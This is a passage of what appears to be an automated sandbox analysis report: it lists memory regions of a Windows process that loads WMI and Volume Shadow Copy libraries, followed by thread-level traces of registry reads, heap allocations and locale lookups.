	     entry_point = 0x6f628fa0
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll")

Region:
	              id = 3931
	        start_va = 0x1030000
	          end_va = 0x106ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001030000"
	        filename = ""

Region:
	              id = 3932
	        start_va = 0x50e0000
	          end_va = 0x511ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000050e0000"
	        filename = ""

Region:
	              id = 3933
	        start_va = 0x5120000
	          end_va = 0x515ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005120000"
	        filename = ""

Region:
	              id = 3934
	        start_va = 0x5160000
	          end_va = 0x519ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005160000"
	        filename = ""

Region:
	              id = 3965
	        start_va = 0x51a0000
	          end_va = 0x51dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000051a0000"
	        filename = ""

Region:
	              id = 3966
	        start_va = 0x51e0000
	          end_va = 0x521ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000051e0000"
	        filename = ""

Region:
	              id = 3977
	        start_va = 0x6f500000
	          end_va = 0x6f51bfff
	       monitored = 0
	     entry_point = 0x6f50aa90
	     region_type = mapped_file
	            name = "wmiutils.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll")

Region:
	              id = 4088
	        start_va = 0x6f460000
	          end_va = 0x6f480fff
	       monitored = 0
	     entry_point = 0x6f476dc0
	     region_type = mapped_file
	            name = "vsswmi.dll"
	        filename = "\\Windows\\SysWOW64\\wbem\\vsswmi.dll" (normalized: "c:\\windows\\syswow64\\wbem\\vsswmi.dll")

Region:
	              id = 4089
	        start_va = 0x6f850000
	          end_va = 0x6f88efff
	       monitored = 0
	     entry_point = 0x6f8646c0
	     region_type = mapped_file
	            name = "framedynos.dll"
	        filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll")

Region:
	              id = 4090
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 4092
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 4114
	        start_va = 0x620000
	          end_va = 0x621fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000620000"
	        filename = ""

Region:
	              id = 4153
	        start_va = 0x5220000
	          end_va = 0x52fffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 4154
	        start_va = 0x6a0000
	          end_va = 0x6a0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "netmsg.dll"
	        filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll")

Region:
	              id = 4155
	        start_va = 0x5300000
	          end_va = 0x5331fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "netmsg.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui")


Thread:
	id = 266
	os_tid = 0xc84

	[0263.093] malloc (_Size=0x80) returned 0x950f78
	[0263.094] GetProcessHeap () returned 0x6b0000
	[0263.094] __dllonexit () returned 0x6f7ef6d0
	[0263.094] GetProcessHeap () returned 0x6b0000
	[0263.095] __dllonexit () returned 0x6f7ef6e0
	[0263.095] __dllonexit () returned 0x6f7ef6f0
	[0263.096] GetTickCount () returned 0x189140d
	[0263.096] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xe4
	[0263.096] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x74590000
	[0263.097] GetProcAddress (hModule=0x74590000, lpProcName="RegCreateKeyExW") returned 0x74631b20
	[0263.097] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0xcf410, lpdwDisposition=0xcf3d0 | out: phkResult=0xcf410*=0x0, lpdwDisposition=0xcf3d0*=0x2) returned 0x5
	[0263.099] GetSystemDirectoryW (in: lpBuffer=0x6f82b5bc, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0263.100] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WBEM\\Logs\\" (normalized: "c:\\windows\\syswow64\\wbem\\logs")) returned 0x10
	[0263.100] GetLastError () returned 0x0
	[0263.100] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xcf418, lpdwDisposition=0xcf3d8 | out: phkResult=0xcf418*=0x0, lpdwDisposition=0xcf3d8*=0x2) returned 0x5
	[0263.102] _vsnwprintf (in: _Buffer=0xcf3b8, _BufferCount=0x1d, _Format="%d", _ArgList=0xcf3a8 | out: _Buffer="1") returned 1
	[0263.103] _vsnwprintf (in: _Buffer=0xcf3b8, _BufferCount=0x1d, _Format="%d", _ArgList=0xcf3a8 | out: _Buffer="65536") returned 5
	[0263.103] __dllonexit () returned 0x6f7ef700
	[0263.104] __dllonexit () returned 0x6f7ef710
	[0263.104] __dllonexit () returned 0x6f7ef720
	[0263.106] __dllonexit () returned 0x6f7ef730
	[0263.106] __dllonexit () returned 0x6f7ef740
	[0263.106] DisableThreadLibraryCalls (hLibModule=0x6f7d0000) returned 1
	[0263.107] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6b9b48
	[0263.107] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6b9b68
	[0263.107] GetVersion () returned 0x295a000a
	[0263.107] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77040000
	[0263.108] GetProcAddress (hModule=0x77040000, lpProcName="EtwRegisterTraceGuidsW") returned 0x770889c0
	[0263.108] EtwRegisterTraceGuidsW () returned 0x0
	[0263.108] EtwRegisterTraceGuidsW () returned 0x0
	[0268.554] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6cbde8
	[0268.554] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8) returned 0x6c5150
	[0268.554] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbde8) returned 1
	[0268.572] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbcf8
	[0268.573] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4) returned 0x6c5160
	[0268.574] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6cb3b0
	[0268.575] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6c4c58
	[0268.576] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cb3b0) returned 1
	[0271.737] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb4d0
	[0271.737] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc070
	[0271.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x44) returned 0x6dc9e8
	[0271.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb650
	[0271.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc010
	[0271.738] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6d9c38
	[0271.739] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb4f0
	[0271.739] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc040
	[0271.739] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6cc0a0
	[0271.739] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb510
	[0271.740] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc2b0
	[0271.740] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc3d0
	[0271.740] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb750
	[0271.740] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc100
	[0271.740] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26) returned 0x6cc130
	[0271.741] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb530
	[0271.741] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc2e0
	[0271.741] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x26) returned 0x6cc190
	[0271.741] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6d9df0
	[0271.742] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc400
	[0271.742] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x5a) returned 0x6da4d0
	[0271.742] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc1c0
	[0271.742] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x5e) returned 0x6da538
	[0271.742] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb550
	[0271.743] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc250
	[0271.743] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x64) returned 0x6da5a0
	[0271.743] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6d9e18
	[0271.743] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc280
	[0271.744] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x68) returned 0x6da610
	[0271.744] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb370
	[0271.744] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc670
	[0271.744] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x5c) returned 0x6da680
	[0271.745] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6d9b70
	[0271.745] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc5b0
	[0271.745] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x56) returned 0x6da6e8
	[0271.745] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb670
	[0271.746] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc6a0
	[0271.746] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x46) returned 0x6dc998
	[0271.746] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6dce48
	[0271.747] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc6d0
	[0271.748] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x86) returned 0x6da748
	[0271.749] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6dcba8
	[0271.749] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc580
	[0271.749] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x56) returned 0x6dd340
	[0271.749] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6dcd68
	[0271.750] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc5e0
	[0271.750] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4e) returned 0x6db7c0
	[0271.750] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6dcde8
	[0271.750] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6cc640
	[0271.750] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc498
	[0271.753] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x78) returned 0x6cd7a0
	[0271.754] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbc38
	[0271.756] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcc88
	[0271.758] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcbc8
	[0271.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-0.dll", hFile=0x0, dwFlags=0x8) returned 0x74590000
	[0271.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x74590000
	[0271.915] GetProcAddress (hModule=0x74590000, lpProcName="GetThreadPreferredUILanguages") returned 0x746521e0
	[0271.916] GetProcAddress (hModule=0x74590000, lpProcName="SetThreadPreferredUILanguages") returned 0x74642fa0
	[0271.916] GetProcAddress (hModule=0x74590000, lpProcName="LocaleNameToLCID") returned 0x74647de0
	[0271.916] GetProcAddress (hModule=0x74590000, lpProcName="GetLocaleInfoEx") returned 0x74636610
	[0271.916] GetProcAddress (hModule=0x74590000, lpProcName="LCIDToLocaleName") returned 0x74646fc0
	[0271.916] GetProcAddress (hModule=0x74590000, lpProcName="GetSystemDefaultLocaleName") returned 0x74663100
	[0271.916] RtlRestoreLastWin32Error () returned 0x0
	[0271.917] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xcf8ec, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcf83c | out: pulNumLanguages=0xcf8ec, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcf83c) returned 1
	[0271.917] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcda8
	[0271.917] RtlRestoreLastWin32Error () returned 0x0
	[0271.917] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xcf8ec, pwszLanguagesBuffer=0x6dcda8, pcchLanguagesBuffer=0xcf83c | out: pulNumLanguages=0xcf8ec, pwszLanguagesBuffer=0x6dcda8, pcchLanguagesBuffer=0xcf83c) returned 1
	[0271.917] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dce28
	[0271.917] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409
	[0271.918] LocaleNameToLCID (lpName="en", dwFlags=0x0) returned 0x409
	[0271.919] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcda8) returned 1
	[0271.919] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x12) returned 0x6dcea8
	[0272.356] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6cc610
	[0272.398] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc718
	[0272.400] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2
	[0272.405] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcea8) returned 1
	[0272.406] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dce28) returned 1
	[0272.406] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbc38) returned 1
	[0272.406] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcc88) returned 1
	[0272.407] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcbc8) returned 1
	[0272.408] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cd7a0) returned 1
	[0272.408] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c4c58) returned 1
	[0272.408] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c5160) returned 1
	[0272.410] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbcf8) returned 1
	[0272.582] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6cbc20
	[0272.583] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6de0f0
	[0272.584] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbbf0
	[0272.586] GetProcAddress (hModule=0x74590000, lpProcName="RegOpenKeyExW") returned 0x74633680
	[0272.586] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", ulOptions=0x0, samDesired=0x20019, phkResult=0xcf1d4 | out: phkResult=0xcf1d4*=0x1d8) returned 0x0
	[0272.586] GetProcAddress (hModule=0x74590000, lpProcName="RegQueryValueExW") returned 0x746330f0
	[0272.586] RegQueryValueExW (in: hKey=0x1d8, lpValueName="EnableObjectValidation", lpReserved=0x0, lpType=0xcf178, lpData=0xcf180, lpcbData=0xcf174*=0x19 | out: lpType=0xcf178*=0x0, lpData=0xcf180*=0x19, lpcbData=0xcf174*=0x19) returned 0x2
	[0272.587] GetProcAddress (hModule=0x74590000, lpProcName="RegCloseKey") returned 0x746344c0
	[0272.587] RegCloseKey (hKey=0x1d8) returned 0x0
	[0272.587] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbbf0) returned 1
	[0272.588] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbc20) returned 1
	[0272.588] ResolveDelayLoadedAPI () returned 0x76d09d40
	[0272.591] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6de0f0) returned 1
	[0272.603] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6cbcf8
	[0272.603] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6de0f0
	[0272.604] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbbf0
	[0272.604] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbbf0) returned 1
	[0272.604] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbcf8) returned 1
	[0272.605] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6de0f0) returned 1
	[0272.615] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6cbcf8
	[0272.615] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6de1c8
	[0272.616] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbe48
	[0272.616] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbe48) returned 1
	[0272.616] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbcf8) returned 1
	[0272.620] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6de1c8) returned 1
	[0272.690] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dc718) returned 1
	[0272.690] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cc610) returned 1
	[0272.690] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c5150) returned 1

Thread:
	id = 270
	os_tid = 0x10a0


Thread:
	id = 288
	os_tid = 0x1394


Thread:
	id = 291
	os_tid = 0x13b0

	[0274.511] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x78) returned 0x6cdea0
	[0274.511] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbd88
	[0274.512] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbd88) returned 1
	[0274.513] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6d9c88
	[0274.514] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcec8
	[0274.514] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcd88
	[0274.514] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcf48
	[0274.515] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcce8
	[0274.515] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcea8
	[0274.517] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6dd9a0
	[0274.517] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc808
	[0274.518] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2
	[0274.520] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x28) returned 0x6ddc70
	[0274.520] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc8a8
	[0274.521] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2
	[0274.703] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8) returned 0x6c50e0
	[0274.703] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x64) returned 0x6e71b8
	[0274.703] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6d9cb0
	[0274.704] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c50e0) returned 1
	[0274.704] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6dcca8
	[0274.704] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6dcdc8
	[0274.705] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa) returned 0x6cbc20
	[0274.705] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dc7b8
	[0274.705] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbc38
	[0274.705] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa) returned 0x6cbef0
	[0274.705] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbc20) returned 1
	[0274.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x48) returned 0x6dca88
	[0274.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbed8
	[0274.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6cbe90
	[0274.706] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4) returned 0x6c5160
	[0274.707] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcdc8) returned 1
	[0274.719] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x78) returned 0x6cd0a0
	[0274.720] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbf08
	[0274.720] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbf08) returned 1
	[0274.721] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6d9d28
	[0274.721] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcb68
	[0274.721] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcbc8
	[0274.721] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcdc8
	[0274.722] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcbe8
	[0274.722] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6dcd28
	[0275.159] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc) returned 0x6cbf08
	[0275.160] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6e84d0
	[0275.160] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbf38
	[0275.163] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbf38) returned 1
	[0275.163] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbf08) returned 1
	[0275.165] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8) returned 0x6c51b0
	[0275.165] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6dcc08
	[0275.165] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c51b0) returned 1
	[0275.166] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c) returned 0x6e3440
	[0275.166] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6dcc08) returned 1
	[0275.167] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xc8) returned 0x6ba810
	[0275.167] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ba810) returned 1
	[0275.168] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x50) returned 0x6db9d0
	[0275.168] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6db9d0) returned 1
	[0275.168] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x9c) returned 0x6bb3f0
	[0275.168] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6e3440) returned 1
	[0275.169] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bb3f0) returned 1
	[0275.175] memcpy (in: _Dst=0x61e0d8, _Src=0x6e8428, _Size=0x4 | out: _Dst=0x61e0d8) returned 0x61e0d8
	[0275.177] memcpy (in: _Dst=0x61e0d8, _Src=0x6e7d35, _Size=0x4 | out: _Dst=0x61e0d8) returned 0x61e0d8
	[0275.178] memcpy (in: _Dst=0x61e0d8, _Src=0x6e8430, _Size=0x2 | out: _Dst=0x61e0d8) returned 0x61e0d8
	[0275.178] memcpy (in: _Dst=0x61e0d8, _Src=0x6e7d3b, _Size=0x2 | out: _Dst=0x61e0d8) returned 0x61e0d8
	[0275.178] memcpy (in: _Dst=0x61e0d8, _Src=0x6e8434, _Size=0x2 | out: _Dst=0x61e0d8) returned 0x61e0d8
	[0276.226] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xbc) returned 0x6e8898
	[0276.226] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x24) returned 0x6ddb80
	[0276.679] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4) returned 0x6c51b0
	[0276.679] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x190) returned 0x6e8e70
	[0276.679] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x10) returned 0x6cbf08
	[0276.680] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6cbf08) returned 1
